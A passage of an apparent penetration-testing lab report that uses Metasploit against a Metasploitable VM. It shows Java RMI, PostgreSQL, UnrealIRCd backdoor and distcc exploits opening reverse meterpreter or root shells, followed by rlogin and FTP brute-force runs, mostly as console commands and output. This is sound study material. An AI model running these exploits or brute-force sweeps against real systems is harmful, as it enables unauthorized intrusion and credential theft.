The configurations are modified accordingly and when we run, we can notice in the below screenshot **meterpreter session 1 opened** i.e., a meterpreter session is opened. Further when we use **session -i Id**, we login to remote session where we execute basic meterpreter commands.

We can see that the exploit started a handler on our system, sent the RMI method call to the target, and that a Meterpreter session was successfully opened. We can now use commands like **getuid**, to see the user that Meterpreter is running as on the target, and **sysinfo**, to display information about the target.

```

msf5 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.56.101:4444
[*] 192.168.56.105:1099 - Using URL: http://0.0.0.0:8080/d57E3hxSWUElG
[*] 192.168.56.105:1099 - Local IP: http://127.0.0.1:8080/d57E3hxSWUElG
[*] 192.168.56.105:1099 - Server started.
[*] 192.168.56.105:1099 - Sending RMI Header ...
[*] 192.168.56.105:1099 - Sending RMI Call...
[*] 192.168.56.105:1099 - Replied to request for payload JAR
[*] Sending stage (53906 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:4444 → 192.168.56.105:36744) at 2020-05-17 13:55:12 -0400
[-] 192.168.56.105:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.56.105:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/misc/java_rmi_server) > sessions

Active sessions
=====
Id  Name      Type      Information           Connection
--  --        --        -----      -----
1   meterpreter java/linux root @ metasploitable 192.168.56.101:4444 → 192.168.56.105:36744 (192.168.56.105)

msf5 exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1 ...

```

Running **getuid** will display the user that the Meterpreter server is running as on the host. Here when session is opened and **getuid** command gave root user and also **ls** command to display the files listed.

```
meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: root
meterpreter > ls
Listing: /
=====
Mode          Size      Type  Last modified           Name
----          ----      ---   -----                --
40666/rw-rw-rw-  4096     dir   2012-05-13 23:35:33 -0400 bin
40666/rw-rw-rw-  1024     dir   2012-05-13 23:36:28 -0400 boot
40666/rw-rw-rw-  4096     dir   2010-03-16 18:55:51 -0400 cdrom
40666/rw-rw-rw-  13540    dir   2020-05-04 17:32:38 -0400 dev
40666/rw-rw-rw-  4096     dir   2020-05-04 03:51:34 -0400 etc
40666/rw-rw-rw-  4096     dir   2010-04-16 02:16:02 -0400 home
40666/rw-rw-rw-  4096     dir   2010-03-16 18:57:40 -0400 initrd
100666/rw-rw-rw- 7929183  fil   2012-05-13 23:35:56 -0400 initrd.img
40666/rw-rw-rw-  4096     dir   2012-05-13 23:35:22 -0400 lib
40666/rw-rw-rw-  16384    dir   2010-03-16 18:55:15 -0400 lost+found
40666/rw-rw-rw-  4096     dir   2010-03-16 18:55:52 -0400 media
40666/rw-rw-rw-  4096     dir   2010-04-28 16:16:56 -0400 mnt
100666/rw-rw-rw- 8705     fil   2020-05-04 03:51:38 -0400 nohup.out
40666/rw-rw-rw-  4096     dir   2010-03-16 18:57:39 -0400 opt
40666/rw-rw-rw-  0        dir   2020-05-04 03:51:10 -0400 proc
40666/rw-rw-rw-  4096     dir   2020-05-04 03:51:38 -0400 root
40666/rw-rw-rw-  4096     dir   2012-05-13 21:54:53 -0400 sbin
40666/rw-rw-rw-  4096     dir   2010-03-16 18:57:38 -0400 srv
40666/rw-rw-rw-  0        dir   2020-05-04 03:51:11 -0400 sys
40666/rw-rw-rw-  4096     dir   2020-05-05 02:58:39 -0400 tmp
40666/rw-rw-rw-  4096     dir   2010-04-28 00:06:37 -0400 usr
40666/rw-rw-rw-  4096     dir   2010-03-17 10:08:23 -0400 var
100666/rw-rw-rw- 1987288  fil   2008-04-10 12:55:41 -0400 vmlinuz
```

OUTPUT: Thus we have gained remote access to server through the exploit module mentioned and used meterpreter commands to know the root user id and ls command to list the files.

10. POSTGRES - Remote code execution

For postgres remote code execution, i use the module **exploit/linux/postgres/postgres_payload**. With the help of this module, the meterpreter can be opened.

```

msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > search postgres

Matching Modules
=====
#  Name
- -
0 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.
cc Pro SQL Injection
1 auxiliary/admin/http/rails_desive_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
2 auxiliary/admin/postgres/postgres_readfile 2014-06-08 normal No PostgreSQL Server Generic Query
3 auxiliary/admin/postgres/postgres_sql 2014-06-08 normal No PostgreSQL Server Generic Query
4 auxiliary/analyze/crack_databases 2014-06-08 normal No Password Cracker: Databases
5 auxiliary/analyze/jtr_postgres_fast 2014-06-08 normal No John the Ripper Postgres SQL Password Cracker
6 auxiliary/scanner/postgres/postgres_dbname_flag_injection 2014-06-08 normal No PostgreSQL Database Name Command Line Flag Injection
7 auxiliary/scanner/postgres/postgres_hashdump 2014-06-08 normal No Postgres Password Hashdump
8 auxiliary/scanner/postgres/postgres_login 2014-06-08 normal No PostgreSQL Login Utility
9 auxiliary/scanner/postgres/postgres_schemadump 2014-06-08 normal No Postgres Schema Dump
10 auxiliary/scanner/postgres/postgres_version 2014-06-08 normal No PostgreSQL Version Probe
11 auxiliary/server/capture/postgresql 2014-06-08 normal No Authentication Capture: PostgreSQL
12 exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution
13 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkView
FetchServlet.dat SQL Injection
14 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
15 exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution
16 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution
17 exploit/windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution
18 post/linux/gather/enum_users_history 2014-06-08 normal No Linux Gather User History

msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > use exploit/linux/postgres/postgres_payload

```

Now, under options we can find the Username and Password set to **postgres** already, and RHOSTS set to server ip **192.168.56.105**, and VERBOSE flag set **true** and LHOST set to local host. Already we know port number for postgresql is **5432**.

The basic properties are changed and executed.

On some default installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries's from there as well, allowing execution of arbitrary code.

```

msf5 exploit(linux/postgres/postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):
=====
Name      Current Setting  Required  Description
----      -----          -----    -----
DATABASE  template1        yes       The database to authenticate against
PASSWORD  postgres          no        The password for the specified username. Leave blank for a random password.
RHOSTS    192.168.56.105   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT     5432              yes       The target port
USERNAME  postgres          yes       The username to authenticate as
VERBOSE   false             no        Enable verbose output

Payload options (linux/x86/meterpreter/reverse_tcp):
=====
Name      Current Setting  Required  Description
----      -----          -----    -----
LHOST    192.168.56.101   yes       The listen address (an interface may be specified)
LPORT    4444              yes       The listen port

Exploit target:
=====
Id  Name
--  --
0  Linux x86

```

Now the Meterpreter opens a session where the meterpreter commands can be used to get some information. Th **getuid** gives the unix Id (**uid**) of the user the process is running under, unix group Id (**gid**) the process is running under, effective user Id (**euid**) the process is running under - The EUID determines what a program is allowed to do, based on what the user with this UID is allowed to do, and **egid** is same as euid but they are meant for groups.

```
msf5 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] 192.168.56.105:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/yOplaQeV.so, should be cleaned up automatically
[*] Sending stage (985320 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:4444 → 192.168.56.105:47497) at 2020-05-18 02:51:14 -0400

meterpreter > getuid
Server username: uid=108, gid=117, euid=108, egid=117
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > ls
Listing: /var/lib/postgresql/8.3/main
=====
Mode          Size  Type  Last modified      Name
----          ---   ---   -----           ---
100600/rw-----  4    fil   2010-04-28 16:26:59 -0400  PG_VERSION
40700/rwx----- 4096  dir   2010-04-28 16:27:01 -0400  base
40700/rwx----- 4096  dir   2020-05-05 05:48:21 -0400  global
40700/rwx----- 4096  dir   2010-04-28 16:26:59 -0400  pg_clog
40700/rwx----- 4096  dir   2010-04-28 16:26:59 -0400  pg_multixact
40700/rwx----- 4096  dir   2010-04-28 16:26:59 -0400  pg_subtrans
40700/rwx----- 4096  dir   2010-04-28 16:26:59 -0400  pg_tblspc
40700/rwx----- 4096  dir   2010-04-28 16:26:59 -0400  pg_twophase
40700/rwx----- 4096  dir   2010-04-28 16:26:59 -0400  pg_xlog
100600/rw----- 125   fil   2020-05-04 03:51:32 -0400  postmaster.opts
100600/rw----- 54    fil   2020-05-04 03:51:32 -0400  postmaster.pid
100644/rw-r--r-- 540   fil   2010-04-28 16:28:06 -0400  root.crt
100644/rw-r--r-- 1224  fil   2010-04-28 16:28:07 -0400  server.crt
```

OUTPUT: Using the given module, the remote access is gained and different meterpreter commands are executed to get Id, basic system information and list files. Also modification/ deletion / creation activities can be performed on these files.

11. Unreal IRC - Remote code execution

Here i use the exploit module **exploit/unix/irc/unreal_ircd_3281_backdoor** and try to gain access to remote host through this exploit.

```

File Actions Edit View Help
msf5 exploit(linux/postgres/postgres_payload) > search unreal_ircd
Matching Modules
=====
#  Name                                     Disclosure Date   Rank      Check  Description
-  --
0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12     excellent  No    UnrealIRCD 3.2.8.1 Backdoor Command Execution

```

For basic settings, the host is set to server ip **192.168.56.105** and other advance settings are also set accordingly. And the port value is known already as **6667**.

```

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name  Current Setting  Required  Description
----  -----  -----  -----
RHOSTS  192.168.56.105  yes        The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT  6667            yes        The target port (TCP)

Exploit target:
Id  Name
-  -
0  Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show advanced
Module advanced options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name  Current Setting  Required  Description
----  -----  -----  -----
CHOST                           no        The local client address
CPORT                           no        The local client port
ConnectTimeout      10          yes       Maximum number of seconds to establish a TCP connection
ContextInformationFile          no        The information file that contains context information
DisablePayloadHandler  false     no        Disable the handler code for the selected payload
EnableContextEncoding  false     no        Use transient context when encoding payloads
Proxies                          no        A proxy chain of format type:host:port[,type:host:port][ ... ]
SSL                            false     no        Negotiate SSL/TLS for outgoing connections
SSLCipher                      no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode      PEER         no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion          Auto        yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS,
SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE                         false     no        Enable detailed status messages
WORKSPACE                      no        Specify the workspace for this module

```

Activate Windows
Go to PC settings to activate Windows.

Now we run and notice command shell has opened and we can run basic shell commands. Here **id** command gives the root user and following other commands tell the version, present working directory and so on.

```

ConnectionTimeout => 7
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 192.168.56.101:4444
[*] 192.168.56.105:6667 - Connected to 192.168.56.105:6667 ...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.56.105:6667 - Sending backdoor command ...
[*] Accepted the first client connection ...
[*] Accepted the second client connection ...
[*] Command: echo CItkjVpmT6hQqCQf;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "CItkjVpmT6hQqCQf\r\n"
[*] Matching ...
[*] A is input...
[*] Command shell session 2 opened (192.168.56.101:4444 → 192.168.56.105:44665) at 2020-05-18 05:50:54 -0400

id
uid=0(root) gid=0(root)
pwd
/etc/unreal
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root
ls
Donation
LICENSE
aliases
badwords.channel.conf
badwords.message.conf
badwords.quit.conf
curl-ca-bundle.crt
dccallow.conf

```

OUTPUT: In the above scenario, we have gained remote access to server through the identified module for irc service and executed some basic commands like id, ls, pwd and captured the results.

12. DISTCC - Remote code execution

There is only one module **exploit/unix/distcc_exec** and uses a documented security weakness to execute arbitrary commands on any system running distccd.

```

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > search distcc
Matching Modules
=====
#  Name                      Disclosure Date  Rank      Check  Description
-  ----                      -----          -----    -----  -----
0  exploit/unix/misc/distcc_exec  2002-02-01   excellent Yes    DistCC Daemon Command Execution

```

The hosts is set to server ip value as known and so the verbose set to true.

```

Module options (exploit/unix/misc/distcc_exec):
Name  Current Setting  Required  Description
----  -----  -----  -----
RHOSTS  192.168.56.105  yes        The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT   3632          yes        The target port (TCP)

Exploit target:
Id  Name
--  --
0  Automatic Target

msf5 exploit(unix/misc/distcc_exec) > show advanced

Module advanced options (exploit/unix/misc/distcc_exec):

Name  Current Setting  Required  Description
----  -----  -----  -----
CHOST                         no       The local client address
CPORT                          no       The local client port
ConnectTimeout      10          yes      Maximum number of seconds to establish a TCP connection
ContextInformationFile          no       The information file that contains context information
DisablePayloadHandler  false    no       Disable the handler code for the selected payload
EnableContextEncoding  false    no       Use transient context when encoding payloads
Proxies                        no       A proxy chain of format type:host:port[,type:host:port][...]
SSL                            false   no       Negotiate SSL/TLS for outgoing connections
SSLCipher                      no       String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode      PEER        no       SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion          Auto        yes      Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS,
SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE                     true     no       Enable detailed status messages
WORKSPACE                    0        no       Specify the workspace for this module
WfsDelay                     0        no       Additional delay when waiting for a session

```

Activate Windows
Go to PC settings to activate Windows.

On run we can see a command shell is opened and opens a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed early, but is still present in modern implementation due to poor configuration of the service.

```

msf5 exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP double handler on 192.168.56.101:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 6vhcD5UoWat69KQS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "6vhcD5UoWat69KQS\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (192.168.56.101:4444 → 192.168.56.105:42222) at 2020-05-18 06:42:49 -0400

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
pwd
/tmp
cd /tmp
ls
4556.jsvc_up
cachelth3p6jar
cachelth3p7jar
cacheyp2p734jar
cacheyp2p736jar
cacheyp5p2bljar
cacheyp5p2bmjar
gconfd-msfadmin
orbit-msfadmin

```

OUTPUT: In the above scenario, we have gained remote access to server through the identified module for distcc service and executed some basic commands like id, ls, pwd and captured the results.

13. RLOGIN - Brute Force

The module present for rlogin to break the authentication is **auxiliary/scanner/rservices/rlogin_login**.

```
msf5 > search rlogin_login
Matching Modules
=====
#  Name
-  ---
0  auxiliary/scanner/rservices/rlogin_login
```

#	Name	Disclosure Date	Rank	Check	Description
0	auxiliary/scanner/rservices/rlogin_login		normal	No	rlogin Authentication Scanner

Checking this module, and modifying the configurations under options. The RHOSTS is set to ip **192.168.56.105**, the USER_FILE and PASS_FILE are set to the **user.txt** and **pass.txt** which has names and passwords listed i created. The port name is already shown as **9600** for rlogin. Also setting the **BRUTEFORCE_SPEED** to lowest to fasten the attack and **VERBOSE** set to **true**.

To stop after 1 successful login we have set **stop_on_success** to **true**.

The below screenshot shows all options after modified.

```
msf5 auxiliary(scanner/rservices/rlogin_login) > show options
Module options (auxiliary/scanner/rservices/rlogin_login):
Name          Current Setting      Required  Description
----          -----              ----
BLANK_PASSWORDS  false            no        Try blank passwords for all users
BRUTEFORCE_SPEED  3               yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS    false            no        Try each user/password couple stored in the current database
DB_ALL_PASS     false            no        Add all passwords in the current database to the list
DB_ALL_USERS    false            no        Add all users in the current database to the list
FROMUSER
FROMUSER_FILE   /usr/share/metasploit-framework/data/wordlists/rservices_from_users.txt  no        The username to login from
PASSWORD
PASS_FILE       ~/Desktop/pass.txt  no        File containing passwords, one per line
RHOSTS          192.168.56.105    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
REPORT          513              yes       The target port (TCP)
SPEED           9600             yes       The terminal speed desired
STOP_ON_SUCCESS true             yes       Stop guessing when a credential works for a host
TERM            vt100            yes       The terminal type desired
THREADS         1                yes       The number of concurrent threads (max one per host)
USERNAME
USERPASS_FILE  , one pair per line, no        A specific username to authenticate as
USER_AS_PASS    false            no        Try the username as the password for all users
USER_FILE       ~/Desktop/user.txt  no        File containing usernames, one per line
VERBOSE         true             yes       Whether to print output for all attempts
```

After running with modified configurations, the user names are checked individually against every password for successful and failed logins. Thus, **brute force** is performed and we get the below,

```
msf5 auxiliary(scanner/rservices/rlogin_login) > run
[*] 192.168.56.105:513 - 192.168.56.105:513 - Starting rlogin sweep
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'admin1' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'admin' from 'daemon'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'msfadmin' from 'bin'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'user' from 'nobody'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'password' from '+'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'qwert' from 'guest'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'123456789' from 'mail'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'123445' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'1234' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'1234567' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'dragon' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'123123' from 'root'

[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'abc123' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'football' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'monkey' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'letmein' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'696969' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'shadow' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'master' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'user1':'666666' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513 Prompt: Password:
[*] 192.168.56.105:513 - 192.168.56.105:513 Result:
[*] 192.168.56.105:513 - 192.168.56.105:513 rlogin - Attempting: 'msfadmin':'admin1' from 'root'
[*] 192.168.56.105:513 - 192.168.56.105:513, rlogin 'msfadmin' from 'root' with no password.
[!] 192.168.56.105:513 - ** auxiliary/scanner/rservices/rlogin_login is still calling the deprecated report_auth_info method! This needs to be updated!
[!] 192.168.56.105:513 - ** For detailed information about LoginScanners and the Credentials objects see:
[!] 192.168.56.105:513 - https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners
[!] 192.168.56.105:513 - https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module
[!] 192.168.56.105:513 - ** For examples of modules converted to just report credentials without report_auth_info, see:
[!] 192.168.56.105:513 - https://github.com/rapid7/metasploit-framework/pull/5376
[!] 192.168.56.105:513 - https://github.com/rapid7/metasploit-framework/pull/5377
[*] Command shell session 1 opened (192.168.56.101:1023 → 192.168.56.105:513) at 2020-05-18 08:49:14 -0400
[*] 192.168.56.105:513 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Activate Windows

Go to PC settings to activate Windows.

We get **rlogin** for '**msfadmin**' from '**root**' with no password present and the execution gets stopped and wont go further. So using **sessions** we can know the active sessions with user id and password and particularly we can login to that successful id and password we got above by **sessions -i Id**

```
msf5 auxiliary(scanner/rservices/rlogin_login) > sessions
Active sessions
=====
Id  Name   Type   Information                                     Connection
--  ---   ----   -----
1    shell  RLOGIN msfadmin from root (192.168.56.105:513)  192.168.56.101:1023 → 192.168.56.105:513 (192.168.56.105)

[*] Starting interaction with 1 ...

[*] 192.168.56.105 - Command shell session 1 closed. Reason: User exit
```

When i try opening the session, it started but **exited** and the reason given was '**user exit**'. But a remote session is successfully opened.

Trying out manual method for rlogin brute force:

The exploit completely works on my local machine and able to login with rlogin as '**msfadmin**' but not as **root**.

```
root@kali:/# rlogin -l msfadmin 192.168.56.105
msfadmin@192.168.56.105's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/*copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Tue May  5 10:49:48 2020 from 192.168.56.101
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$ pwd
/home/msfadmin
msfadmin@metasploitable:~$
```

In the above, we entered into shell and i am able to get the **id** for msfadmin as user id, group id, no. of groups and so on. Also, executed other basic shell commands.

OUTPUT: Executing the module in msfconsole opens a sessions but ends showing 'user exit'. For manual method in local machine it works for msfadmin and enters to shell where the id of msfadmin is captured and other details also shown.

14. Bindshell - remote code execution

15. Proftpd - Brute force

The Proftpd 1.3.1 runs on port 2121. The vulnerability is their weak password policy and user account lockouts doesn't occur after many login failed attempts.

As we tried user name **anonymous** for ftp, similarly we try on proftpd as well with its port number mentioned.

It shows **login failed** and hence, to try brute force attack on auxiliary module in ftp and for successful login attempts, we can use those credentials on our local machine with port **2121** to see if we can login successfully.

```
root@kali:/# ftp 192.168.56.105 2121
Connected to 192.168.56.105.
220 ProFTPD 1.3.1 Server (Debian) [ ::ffff:192.168.56.105]
Name (192.168.56.105:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> █
```

Hence, we use the below module **auxiliary/scanner/ftp/ftp_login** as seen in 'ftp brute force attack' to get successful login credentials.

```
msf5 > search ftp_login
Matching Modules
=====
#  Name                      Disclosure Date  Rank   Check  Description
-  ---
0  auxiliary/scanner/ftp/ftp_login                         normal  No    FTP Authentication Scanner

msf5 > use auxiliary/scanner/ftp/ftp_login
```

The settings are modified as set host to server ip, reduce brute force speed, set verbose to true, create users and common password list in desktop and set them to `USER_FILE` and `PASS_FILE` under the settings. And run command is used.

Module options (auxiliary/scanner/ftp/ftp_login):			
Name	Current Setting	Required	Description
BLANK_PASSWORDS	false	no	Try blank passwords for all users
BRUTEFORCE_SPEED	2	yes	How fast to bruteforce, from 0 to 5
DB_ALL_CREDS	false	no	Try each user/password couple stored in the current database
DB_ALL_PASS	false	no	Add all passwords in the current database to the list
DB_ALL_USERS	false	no	Add all users in the current database to the list
PASSWORD		no	A specific password to authenticate with
PASS_FILE	~/Desktop/pass.txt	no	File containing passwords, one per line
Proxies		no	A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST	false	no	Record anonymous/guest logins to the database
RHOSTS	192.168.56.105	yes	The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT	21	yes	The target port (TCP)
STOP_ON_SUCCESS	false	yes	Stop guessing when a credential works for a host
THREADS	1	yes	The number of concurrent threads (max one per host)
USERNAME		no	A specific username to authenticate as
USERPASS_FILE		no	File containing users and passwords separated by space, one pair per line
USER_AS_PASS	false	no	Try the username as the password for all users
USER_FILE	~/Desktop/user.txt	no	File containing usernames, one per line
VERBOSE	true	yes	Whether to print output for all attempts

```
msf5 auxiliary(scanner/ftp/ftp_login) > run

[*] 192.168.56.105:21 - 192.168.56.105:21 - Starting FTP login sweep
[!] 192.168.56.105:21 - No active DB -- Credential data will not be saved!
[+] 192.168.56.105:21 - 192.168.56.105:21 - Login Successful: user:user
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: msfadmin:user (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: msfadmin:admin (Incorrect: )
[+] 192.168.56.105:21 - 192.168.56.105:21 - Login Successful: msfadmin:msfadmin
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:user (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:admin (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:msfadmin (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:postgres (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:password (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:qwerty (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:123456789 (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:666666 (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:1234 (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:qwerty (Incorrect: )
[-] 192.168.56.105:21 - 192.168.56.105:21 - LOGIN FAILED: admin:dragon (Incorrect: )
